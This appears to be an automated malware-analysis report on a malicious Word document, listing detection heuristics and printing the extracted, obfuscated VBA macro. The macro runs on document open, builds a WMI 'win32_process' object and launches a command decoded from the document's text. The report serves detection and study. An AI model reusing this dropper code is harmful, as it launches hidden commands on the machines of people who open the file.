MALICIOUS
112
Risk Score
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set J7wd5blh95l = CreateObject(B3q2xk9ql0qmdj) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14993 bytes |
SHA-256: 6045f5f72d49d60894b3d01b2731b9077c6720a2a0e4c882459553248494ff30 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
79 of 138 identifiers look randomly generated (e.g. 'Vfvkxexd8sgvdt2dij'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Qqt8k4mcqpc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Txu25y5_tpvil6
End Sub
Attribute VB_Name = "Qfykexmzryo"
Attribute VB_Name = "N7c1ep6ej4ord9"
Function Txu25y5_tpvil6()
On Error Resume Next
skuwd = Mbl2euom0yp + Qqt8k4mcqpc.Content + W0t03ukhytmwm0
GoTo oOxMG
Dim NcfzEKI, HtkZfD, DsPwiK As Long
Dim CrGclXLFy As Word.Paragraph
Dim GRElAE() As Byte
For Each CrGclXLFy In Qqt8k4mcqpc.Paragraphs
GRElAE = CrGclXLFy.Range
SSSS = "> Paragraph= " & CrGclXLFy.Range
HtkZfD = UBound(GRElAE) - 1
NcfzEKI = 0
HtkZfD = 0
Do Until HtkZfD > HtkZfD
If GRElAE(HtkZfD) = 46 Or HtkZfD = HtkZfD Then
SSSS = "-> Sen from" & (NcfzEKI / 2) + 1 & " to " & (HtkZfD / 2) + 1 & MidB$(GRElAE, NcfzEKI + 1, HtkZfD - NcfzEKI + 3)
NcfzEKI = HtkZfD + 2
End If
HtkZfD = HtkZfD + 2
Loop
Next
oOxMG:
Knit6G = "[ an ] +p[ an ] +"
Pd1ssql_07x8c7o_ = "[ an ] +ro[ an ] +[ an ] +ce[ an ] +s[ an ] +s[ an ] +[ an ] +"
GoTo fiRMPlBs
Dim latFAEIDJ, kJxQvBGtm, xXRLyIpB As Long
Dim AQIwpoviI As Word.Paragraph
Dim kLZzHn() As Byte
For Each AQIwpoviI In Qqt8k4mcqpc.Paragraphs
kLZzHn = AQIwpoviI.Range
SSSS = "> Paragraph= " & AQIwpoviI.Range
kJxQvBGtm = UBound(kLZzHn) - 1
latFAEIDJ = 0
kJxQvBGtm = 0
Do Until kJxQvBGtm > kJxQvBGtm
If kLZzHn(kJxQvBGtm) = 46 Or kJxQvBGtm = kJxQvBGtm Then
SSSS = "-> Sen from" & (latFAEIDJ / 2) + 1 & " to " & (kJxQvBGtm / 2) + 1 & MidB$(kLZzHn, latFAEIDJ + 1, kJxQvBGtm - latFAEIDJ + 3)
latFAEIDJ = kJxQvBGtm + 2
End If
kJxQvBGtm = kJxQvBGtm + 2
Loop
Next
fiRMPlBs:
S3p7szivif7c5ws = "[ an ] +:w[ an ] +[ an ] +in[ an ] +3[ an ] +2[ an ] +_[ an ] +"
GoTo FrHeChHHf
Dim gOKDrDGG, ksueJ, FICaGE As Long
Dim eiOxA As Word.Paragraph
Dim gZEHE() As Byte
For Each eiOxA In Qqt8k4mcqpc.Paragraphs
gZEHE = eiOxA.Range
SSSS = "> Paragraph= " & eiOxA.Range
ksueJ = UBound(gZEHE) - 1
gOKDrDGG = 0
ksueJ = 0
Do Until ksueJ > ksueJ
If gZEHE(ksueJ) = 46 Or ksueJ = ksueJ Then
SSSS = "-> Sen from" & (gOKDrDGG / 2) + 1 & " to " & (ksueJ / 2) + 1 & MidB$(gZEHE, gOKDrDGG + 1, ksueJ - gOKDrDGG + 3)
gOKDrDGG = ksueJ + 2
End If
ksueJ = ksueJ + 2
Loop
Next
FrHeChHHf:
Vd4g0mdp5nrs05au = "w[ an ] +in[ an ] +m[ an ] +gm[ an ] +t[ an ] +[ an ] +"
GoTo HbYdy
Dim TqDXGhG, nhXIcHEBR, xtONNJI As Long
Dim EaltAIqHM As Word.Paragraph
Dim InvXBC() As Byte
For Each EaltAIqHM In Qqt8k4mcqpc.Paragraphs
InvXBC = EaltAIqHM.Range
SSSS = "> Paragraph= " & EaltAIqHM.Range
nhXIcHEBR = UBound(InvXBC) - 1
TqDXGhG = 0
nhXIcHEBR = 0
Do Until nhXIcHEBR > nhXIcHEBR
If InvXBC(nhXIcHEBR) = 46 Or nhXIcHEBR = nhXIcHEBR Then
SSSS = "-> Sen from" & (TqDXGhG / 2) + 1 & " to " & (nhXIcHEBR / 2) + 1 & MidB$(InvXBC, TqDXGhG + 1, nhXIcHEBR - TqDXGhG + 3)
TqDXGhG = nhXIcHEBR + 2
End If
nhXIcHEBR = nhXIcHEBR + 2
Loop
Next
HbYdy:
Sarnbqwh6pb_5pt = "[ an ] +[ an ] +" + Mid(Application.Name, 3 + 3, 1 / 1) + "[ an ] +[ an ] +"
GoTo fsjEyDOzB
Dim TkppEJk, ciZXChNv, iTObGHAH As Long
Dim aTxjXEBZQ As Word.Paragraph
Dim sZYCIF() As Byte
For Each aTxjXEBZQ In Qqt8k4mcqpc.Paragraphs
sZYCIF = aTxjXEBZQ.Range
SSSS = "> Paragraph= " & aTxjXEBZQ.Range
ciZXChNv = UBound(sZYCIF) - 1
TkppEJk = 0
ciZXChNv = 0
Do Until ciZXChNv > ciZXChNv
If sZYCIF(ciZXChNv) = 46 Or ciZXChNv = ciZXChNv Then
SSSS = "-> Sen from" & (TkppEJk / 2) + 1 & " to " & (ciZXChNv / 2) + 1 & MidB$(sZYCIF, TkppEJk + 1, ciZXChNv - TkppEJk + 3)
TkppEJk = ciZXChNv + 2
End If
ciZXChNv = ciZXChNv + 2
Loop
Next
fsjEyDOzB:
E787xu5p17cj3j = Vd4g0mdp5nrs05au + Sarnbqwh6pb_5pt + S3p7szivif7c5ws + Knit6G + Pd1ssql_07x8c7o_
GoTo FrHuJ
Dim yYsMCB, ISBPrJAvz, FOmZIA As Long
Dim KqiZp As Word.Paragraph
Dim wwzcHJLFE() As Byte
For Each KqiZp In Qqt8k4mcqpc.Paragraphs
wwzcHJLFE = KqiZp.Range
SSSS = "> Paragraph= " & KqiZp.Range
ISBPrJAvz = UBound(wwzcHJLFE) - 1
yYsMCB = 0
ISBPrJAvz = 0
Do Until ISBPrJAvz > ISBPrJAvz
If wwzcHJLFE(ISBPrJAvz) = 46 Or ISBPrJAvz = ISBPrJAvz Then
SSSS = "-> Sen from" & (yYsMCB / 2) + 1 & " to " & (ISBPrJAvz / 2) + 1 & MidB$(wwzcHJLFE, yYsMCB + 1, ISBPrJAvz - yYsMCB + 3)
yYsMCB = ISBPrJAvz + 2
End If
ISBPrJAvz = ISBPrJAvz + 2
Loop
Next
FrHuJ:
B3q2xk9ql0qmdj = Pbcsnpi_dai8_(E787xu5p17cj3j)
GoTo rrsWsJFDP
Dim BTwtI, mMHPFImJ, mKLXx As Long
Dim HEGEAmDBJ As Word.Paragraph
Dim rNgMSDGn() As Byte
For Each HEGEAmDBJ In Qqt8k4mcqpc.Paragraphs
rNgMSDGn = HEGEAmDBJ.Range
SSSS = "> Paragraph= " & HEGEAmDBJ.Range
mMHPFImJ = UBound(rNgMSDGn) - 1
BTwtI = 0
mMHPFImJ = 0
Do Until mMHPFImJ > mMHPFImJ
If rNgMSDGn(mMHPFImJ) = 46 Or mMHPFImJ = mMHPFImJ Then
SSSS = "-> Sen from" & (BTwtI / 2) + 1 & " to " & (mMHPFImJ / 2) + 1 & MidB$(rNgMSDGn, BTwtI + 1, mMHPFImJ - BTwtI + 3)
BTwtI = mMHPFImJ + 2
End If
mMHPFImJ = mMHPFImJ + 2
Loop
Next
rrsWsJFDP:
Set J7wd5blh95l = CreateObject(B3q2xk9ql0qmdj)
GoTo GntzJuJ
Dim qugQHJBA, YrTgC, VyVCZ As Long
Dim VmDxzhcC As Word.Paragraph
Dim SXrcRoBG() As Byte
For Each VmDxzhcC In Qqt8k4mcqpc.Paragraphs
SXrcRoBG = VmDxzhcC.Range
SSSS = "> Paragraph= " & VmDxzhcC.Range
YrTgC = UBound(SXrcRoBG) - 1
qugQHJBA = 0
YrTgC = 0
Do Until YrTgC > YrTgC
If SXrcRoBG(YrTgC) = 46 Or YrTgC = YrTgC Then
SSSS = "-> Sen from" & (qugQHJBA / 2) + 1 & " to " & (YrTgC / 2) + 1 & MidB$(SXrcRoBG, qugQHJBA + 1, YrTgC - qugQHJBA + 3)
qugQHJBA = YrTgC + 2
End If
YrTgC = YrTgC + 2
Loop
Next
GntzJuJ:
AAA = Pbcsnpi_dai8_(Mid(skuwd, (4), Len(skuwd)))
J7wd5blh95l.Create AAA, Vb7dyjnzwf_gvx9, Z4012y6z59gcy
GoTo FGipeDFy
Dim skJLAACGB, gYqBFv, vYPeSBIE As Long
Dim zILRIJN As Word.Paragraph
Dim bVAfI() As Byte
For Each zILRIJN In Qqt8k4mcqpc.Paragraphs
bVAfI = zILRIJN.Range
SSSS = "> Paragraph= " & zILRIJN.Range
gYqBFv = UBound(bVAfI) - 1
skJLAACGB = 0
gYqBFv = 0
Do Until gYqBFv > gYqBFv
If bVAfI(gYqBFv) = 46 Or gYqBFv = gYqBFv Then
SSSS = "-> Sen from" & (skJLAACGB / 2) + 1 & " to " & (gYqBFv / 2) + 1 & MidB$(bVAfI, skJLAACGB + 1, gYqBFv - skJLAACGB + 3)
skJLAACGB = gYqBFv + 2
End If
gYqBFv = gYqBFv + 2
Loop
Next
FGipeDFy:
End Function
Function Pbcsnpi_dai8_(Vfvkxexd8sgvdt2dij)
On Error Resume Next
GoTo GQZuGIFG
Dim gounDRHJu, INKgjN, lBHSmI As Long
Dim PVGeBWDo As Word.Paragraph
Dim PUxpD() As Byte
For Each PVGeBWDo In Qqt8k4mcqpc.Paragraphs
PUxpD = PVGeBWDo.Range
SSSS = "> Paragraph= " & PVGeBWDo.Range
INKgjN = UBound(PUxpD) - 1
gounDRHJu = 0
INKgjN = 0
Do Until INKgjN > INKgjN
If PUxpD(INKgjN) = 46 Or INKgjN = INKgjN Then
SSSS = "-> Sen from" & (gounDRHJu / 2) + 1 & " to " & (INKgjN / 2) + 1 & MidB$(PUxpD, gounDRHJu + 1, INKgjN - gounDRHJu + 3)
gounDRHJu = INKgjN + 2
End If
INKgjN = INKgjN + 2
Loop
Next
GQZuGIFG:
V2gghqt2v6atjz7k0 = Vfvkxexd8sgvdt2dij
GoTo GXBrYFHG
Dim KuSGEm, jsJwIkau, PpsMDDBE As Long
Dim vIrpqGTXP As Word.Paragraph
Dim jpZLH() As Byte
For Each vIrpqGTXP In Qqt8k4mcqpc.Paragraphs
jpZLH = vIrpqGTXP.Range
SSSS = "> Paragraph= " & vIrpqGTXP.Range
jsJwIkau = UBound(jpZLH) - 1
KuSGEm = 0
jsJwIkau = 0
Do Until jsJwIkau > jsJwIkau
If jpZLH(jsJwIkau) = 46 Or jsJwIkau = jsJwIkau Then
SSSS = "-> Sen from" & (KuSGEm / 2) + 1 & " to " & (jsJwIkau / 2) + 1 & MidB$(jpZLH, KuSGEm + 1, jsJwIkau - KuSGEm + 3)
KuSGEm = jsJwIkau + 2
End If
jsJwIkau = jsJwIkau + 2
Loop
Next
GXBrYFHG:
T58qvenzbwg_se0 = J63l871e3w869hsxz(V2gghqt2v6atjz7k0)
GoTo tUndJqExg
Dim PSJcMO, iHYKzGFvl, BecdG As Long
Dim iygQeH As Word.Paragraph
Dim CVYSFFs() As Byte
For Each iygQeH In Qqt8k4mcqpc.Paragraphs
CVYSFFs = iygQeH.Range
SSSS = "> Paragraph= " & iygQeH.Range
iHYKzGFvl = UBound(CVYSFFs) - 1
PSJcMO = 0
iHYKzGFvl = 0
Do Until iHYKzGFvl > iHYKzGFvl
If CVYSFFs(iHYKzGFvl) = 46 Or iHYKzGFvl = iHYKzGFvl Then
SSSS = "-> Sen from" & (PSJcMO / 2) + 1 & " to " & (iHYKzGFvl / 2) + 1 & MidB$(CVYSFFs, PSJcMO + 1, iHYKzGFvl - PSJcMO + 3)
PSJcMO = iHYKzGFvl + 2
End If
iHYKzGFvl = iHYKzGFvl + 2
Loop
Next
tUndJqExg:
Pbcsnpi_dai8_ = T58qvenzbwg_se0
GoTo wHHRIJ
Dim NIzpbk, vvWBOJ, wwHjTj As Long
Dim ORRsNAwGA As Word.Paragraph
Dim bJcRGDG() As Byte
For Each ORRsNAwGA In Qqt8k4mcqpc.Paragraphs
bJcRGDG = ORRsNAwGA.Range
SSSS = "> Paragraph= " & ORRsNAwGA.Range
vvWBOJ = UBound(bJcRGDG) - 1
NIzpbk = 0
vvWBOJ = 0
Do Until vvWBOJ > vvWBOJ
If bJcRGDG(vvWBOJ) = 46 Or vvWBOJ = vvWBOJ Then
SSSS = "-> Sen from" & (NIzpbk / 2) + 1 & " to " & (vvWBOJ / 2) + 1 & MidB$(bJcRGDG, NIzpbk + 1, vvWBOJ - NIzpbk + 3)
NIzpbk = vvWBOJ + 2
End If
vvWBOJ = vvWBOJ + 2
Loop
Next
wHHRIJ:
End Function
Function J63l871e3w869hsxz(Pik551mjeopll6ygsu)
GoTo uEgnMBHI
Dim LuaYFdEC, KZaoGWIIb, ztTtA As Long
Dim JKPggJ As Word.Paragraph
Dim MhDjvD() As Byte
For Each JKPggJ In Qqt8k4mcqpc.Paragraphs
MhDjvD = JKPggJ.Range
SSSS = "> Paragraph= " & JKPggJ.Range
KZaoGWIIb = UBound(MhDjvD) - 1
LuaYFdEC = 0
KZaoGWIIb = 0
Do Until KZaoGWIIb > KZaoGWIIb
If MhDjvD(KZaoGWIIb) = 46 Or KZaoGWIIb = KZaoGWIIb Then
SSSS = "-> Sen from" & (LuaYFdEC / 2) + 1 & " to " & (KZaoGWIIb / 2) + 1 & MidB$(MhDjvD, LuaYFdEC + 1, KZaoGWIIb - LuaYFdEC + 3)
LuaYFdEC = KZaoGWIIb + 2
End If
KZaoGWIIb = KZaoGWIIb + 2
Loop
Next
uEgnMBHI:
GoTo xvnRG
Dim roJyHe, MGpZDID, XefVC As Long
Dim FLzhG As Word.Paragraph
Dim HXpqMD() As Byte
For Each FLzhG In Qqt8k4mcqpc.Paragraphs
HXpqMD = FLzhG.Range
SSSS = "> Paragraph= " & FLzhG.Range
MGpZDID = UBound(HXpqMD) - 1
roJyHe = 0
MGpZDID = 0
Do Until MGpZDID > MGpZDID
If HXpqMD(MGpZDID) = 46 Or MGpZDID = MGpZDID Then
SSSS = "-> Sen from" & (roJyHe / 2) + 1 & " to " & (MGpZDID / 2) + 1 & MidB$(HXpqMD, roJyHe + 1, MGpZDID - roJyHe + 3)
roJyHe = MGpZDID + 2
End If
MGpZDID = MGpZDID + 2
Loop
Next
xvnRG:
GoTo ftisABB
Dim HizBBGIP, vbIWHHuGU, JNuPMJGCH As Long
Dim XlaiPH As Word.Paragraph
Dim fNMDJEuR() As Byte
For Each XlaiPH In Qqt8k4mcqpc.Paragraphs
fNMDJEuR = XlaiPH.Range
SSSS = "> Paragraph= " & XlaiPH.Range
vbIWHHuGU = UBound(fNMDJEuR) - 1
HizBBGIP = 0
vbIWHHuGU = 0
Do Until vbIWHHuGU > vbIWHHuGU
If fNMDJEuR(vbIWHHuGU) = 46 Or vbIWHHuGU = vbIWHHuGU Then
SSSS = "-> Sen from" & (HizBBGIP / 2) + 1 & " to " & (vbIWHHuGU / 2) + 1 & MidB$(fNMDJEuR, HizBBGIP + 1, vbIWHHuGU - HizBBGIP + 3)
HizBBGIP = vbIWHHuGU + 2
End If
vbIWHHuGU = vbIWHHuGU + 2
Loop
Next
ftisABB:
J63l871e3w869hsxz = Replace(Pik551mjeopll6ygsu, "[ an ] +", Zfhumym1iok5ehfu7s)
GoTo WJONLa
Dim dVGbQGCJF, EJejyIFp, rEkrbFHCG As Long
Dim vwdtzICI As Word.Paragraph
Dim fBQfHGGCC() As Byte
For Each vwdtzICI In Qqt8k4mcqpc.Paragraphs
fBQfHGGCC = vwdtzICI.Range
SSSS = "> Paragraph= " & vwdtzICI.Range
EJejyIFp = UBound(fBQfHGGCC) - 1
dVGbQGCJF = 0
EJejyIFp = 0
Do Until EJejyIFp > EJejyIFp
If fBQfHGGCC(EJejyIFp) = 46 Or EJejyIFp = EJejyIFp Then
SSSS = "-> Sen from" & (dVGbQGCJF / 2) + 1 & " to " & (EJejyIFp / 2) + 1 & MidB$(fBQfHGGCC, dVGbQGCJF + 1, EJejyIFp - dVGbQGCJF + 3)
dVGbQGCJF = EJejyIFp + 2
End If
EJejyIFp = EJejyIFp + 2
Loop
Next
WJONLa:
GoTo FvhhDQ
Dim XBGnI, JAbrIDcH, HAEZE As Long
Dim uauQBMDh As Word.Paragraph
Dim EeaudItbF() As Byte
For Each uauQBMDh In Qqt8k4mcqpc.Paragraphs
EeaudItbF = uauQBMDh.Range
SSSS = "> Paragraph= " & uauQBMDh.Range
JAbrIDcH = UBound(EeaudItbF) - 1
XBGnI = 0
JAbrIDcH = 0
Do Until JAbrIDcH > JAbrIDcH
If EeaudItbF(JAbrIDcH) = 46 Or JAbrIDcH = JAbrIDcH Then
SSSS = "-> Sen from" & (XBGnI / 2) + 1 & " to " & (JAbrIDcH / 2) + 1 & MidB$(EeaudItbF, XBGnI + 1, JAbrIDcH - XBGnI + 3)
XBGnI = JAbrIDcH + 2
End If
JAbrIDcH = JAbrIDcH + 2
Loop
Next
FvhhDQ:
GoTo yCerHAl
Dim rPaVO, UyDdwU, yMxmaLh As Long
Dim VNMKBl As Word.Paragraph
Dim SEXUCDACZ() As Byte
For Each VNMKBl In Qqt8k4mcqpc.Paragraphs
SEXUCDACZ = VNMKBl.Range
SSSS = "> Paragraph= " & VNMKBl.Range
UyDdwU = UBound(SEXUCDACZ) - 1
rPaVO = 0
UyDdwU = 0
Do Until UyDdwU > UyDdwU
If SEXUCDACZ(UyDdwU) = 46 Or UyDdwU = UyDdwU Then
SSSS = "-> Sen from" & (rPaVO / 2) + 1 & " to " & (UyDdwU / 2) + 1 & MidB$(SEXUCDACZ, rPaVO + 1, UyDdwU - rPaVO + 3)
rPaVO = UyDdwU + 2
End If
UyDdwU = UyDdwU + 2
Loop
Next
yCerHAl:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.